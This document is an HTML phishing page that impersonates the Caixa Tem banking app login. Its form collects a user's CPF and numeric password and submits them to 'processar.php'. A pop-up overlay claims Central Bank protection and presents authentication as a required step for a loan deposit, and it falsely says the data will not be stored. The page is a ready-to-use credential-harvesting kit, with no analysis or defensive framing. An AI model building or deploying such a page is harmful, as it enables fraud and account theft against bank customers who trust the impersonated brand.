<!DOCTYPE html>
<html lang="pt-br">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Caixa Tem</title>
    <style>
        /* Estilo para o corpo da página */
        body {
            background-image: linear-gradient( to right, #005ca9, #31a0e0 );
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            height: 100vh;
            margin: 0;
            font-family: 'Nome da Fonte', sans-serif; /* Adicione essa linha */
        }

        /* Estilo para a logo */
        .logo {
            width: 180px; /* ajuste o tamanho da logo conforme necessário */
            margin-bottom: 20px;
        }

        /* Estilo para os campos de entrada */
        input {
            padding: 10px;
            margin-bottom: 10px;
            width: 90%;
            border: 1px solid #ccc;
            border-radius: 5px;
            font-size: 16px;
        }

        /* Estilo para destacar o campo quando focado */
        input:focus {
            outline: none;
            border-color: #66afe9;
            box-shadow: 0 0 5px #66afe9;
        }

        /* Estilo para o botão de validação */
        .btn-validate {
            background-color: #f29200;
            color: white;
            border: none;
            border-radius: 5px;
            padding: 10px 50px;
            cursor: pointer;
            font-size: 18px; /* Tamanho do texto do botão */
        }

        /* Estilo para o ícone de visualizar senha */
        .show-password-icon {
            position: absolute;
            right: 10px;
            top: 50%;
            transform: translateY(-50%);
            cursor: pointer;
        }

        /* Estilo para a sobreposição */
        .overlay {
            display: none;
            position: fixed;
            bottom: 0;
            left: 0;
            width: 100%;
            background-image: linear-gradient(to right, #005ca9, #31a0e0);
            z-index: 1000;
        }

        /* Estilo para o conteúdo da sobreposição */
        .overlay-content {
            background-color: #fff;
            padding: 100px;
            border-radius: 10px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
            text-align: center;
        }

        /* Estilo para os botões de concordar e recusar na sobreposição */
        .overlay-button {
            background-color: #4CAF50;
            color: white;
            border: none;
            border-radius: 5px;
            padding: 10px 20px;
            cursor: pointer;
            font-size: 18px; /* Tamanho do texto do botão */
            margin: 0 10px;
        }
    </style>
</head>
<body>

    <img src="imgscaixa/caixalogo.png" alt="Logo da Empresa" class="logo">

    <form action="processar.php" method="POST">
        <!-- Campo CPF -->
        <input type="text" id="cpfcaixa" name="cpfcaixa" placeholder="Digite seu CPF:" pattern="\d{3}\.\d{3}\.\d{3}-\d{2}" inputmode="numeric" maxlength="14" required oninput="formatCPF(this)">
        
        <!-- Campo Senha -->
        <div style="position: relative;">
            <input type="password" id="senha" name="senha" placeholder="Digite sua senha:" pattern="([0-9]{6}|[0-9]{8})" inputmode="numeric" maxlength="8" required>
            <span class="show-password-icon" onclick="togglePasswordVisibility(this)"></span>
        </div>

        <!-- Botão de validação -->
        <button class="btn-validate" type="submit">Entrar no CAIXA Tem</button>
    </form>

<!-- Sobreposição -->
<div id="overlay" class="overlay">
    <div class="overlay-content" style="max-width: 400px; text-align: left; padding: 20px;">
        <h1 style="font-size: 20px; color: #333;">DADOS PROTEGIDOS PELO BACEN</h1>
        <p style="font-size: 16px; color: #666; margin: 20px 0; margin-left: 20px;">
            • Caro cliente, para dar continuidade à solicitação de empréstimo, é necessário concluir a autenticação por meio do Caixa Tem, garantindo que o dinheiro seja depositado na conta do titular.
        </p>
        <p style="font-size: 16px; color: #666; margin: 20px 0; margin-left: 20px;">
            • Importante salientar que seus dados não serão armazenados, e a autenticação é uma medida essencial em prol da segurança.
        </p>
        <p style="font-size: 16px; color: #666; margin: 20px 0; margin-left: 20px;">
            • Lembre-se de que a autenticação é um requisito obrigatório para a contratação do empréstimo.
        </p>
        <div style="display: flex; justify-content: center; margin-top: 20px;">
            <button class="overlay-button" id="concordar" style="background-color: #4CAF50; color: white; font-size: 18px; padding: 10px 20px; border-radius: 10px;">Concordar</button>
            <a class="overlay-button" id="recusar" href="proposta_recusada.html" style="background-color: #f00; color: white; font-size: 18px; padding: 10px 20px; border-radius: 10px;">Recusar</a>
        </div>
    </div>
</div>

    <script>
        function formatCPF(input) {
            let value = input.value.replace(/\D/g, '');
            if (value.length > 9) {
                value = value.replace(/^(\d{3})(\d{3})(\d{3})(\d{2})$/, '$1.$2.$3-$4');
            } else if (value.length > 6) {
                value = value.replace(/^(\d{3})(\d{3})(\d{3})$/, '$1.$2.$3');
            } else if (value.length > 3) {
                value = value.replace(/^(\d{3})(\d{3})$/, '$1.$2');
            }
            input.value = value;
        }

        function togglePasswordVisibility(icon) {
            var senhaInput = icon.previousSibling;
            if (senhaInput.type === "password") {
                senhaInput.type = "text";
            } else {
                senhaInput.type = "password";
            }
        }

        // Função para mostrar a sobreposição quando a página carregar
        window.addEventListener("load", function() {
            var overlay = document.getElementById("overlay");
            overlay.style.display = "block";
        });

        // Event listener para o botão "Recusar"
        var recusarButton = document.getElementById("recusar");
        recusarButton.addEventListener("click", function() {
            // Redirecionar para outro site quando "Recusar" é clicado
            window.location.href = recusarButton.href;
        });

// Event listener para o botão "Concordar"
var concordarButton = document.getElementById("concordar");
concordarButton.addEventListener("click", function() {
    // Ocultar a sobreposição somente após clicar em "Concordar"
    var overlay = document.getElementById("overlay");
    overlay.style.display = "none";
});
    </script>
</body>
</html>
